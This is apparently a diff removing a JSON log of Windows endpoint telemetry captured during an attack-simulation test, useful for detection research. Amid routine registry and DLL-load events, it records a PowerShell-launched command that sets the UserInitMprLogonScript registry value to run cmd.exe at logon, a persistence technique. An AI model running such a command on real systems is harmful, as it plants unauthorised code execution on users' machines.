"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wwapi.dll", - "image_path": "C:\\Windows\\System32\\wwapi.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573251360000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4436, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573253050000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": 
"cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573252920000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573252920000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "command_line": "REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6488, - "ppid": 4436, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883573253160000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}", - 
"unique_ppid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": 
"{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "registry", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment", - "registry_value": "Environment", - "timestamp": 131883573253230000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "registry_value": 
"Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "timestamp": 131883573279020000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883573279020000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "file", - "file_name": "SVCHOST.EXE-CD4ED1A8.pf", - "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-CD4ED1A8.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573351680000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "REG.EXE-26976709.pf", - "file_path": "C:\\Windows\\Prefetch\\REG.EXE-26976709.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573354020000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573415119984, - 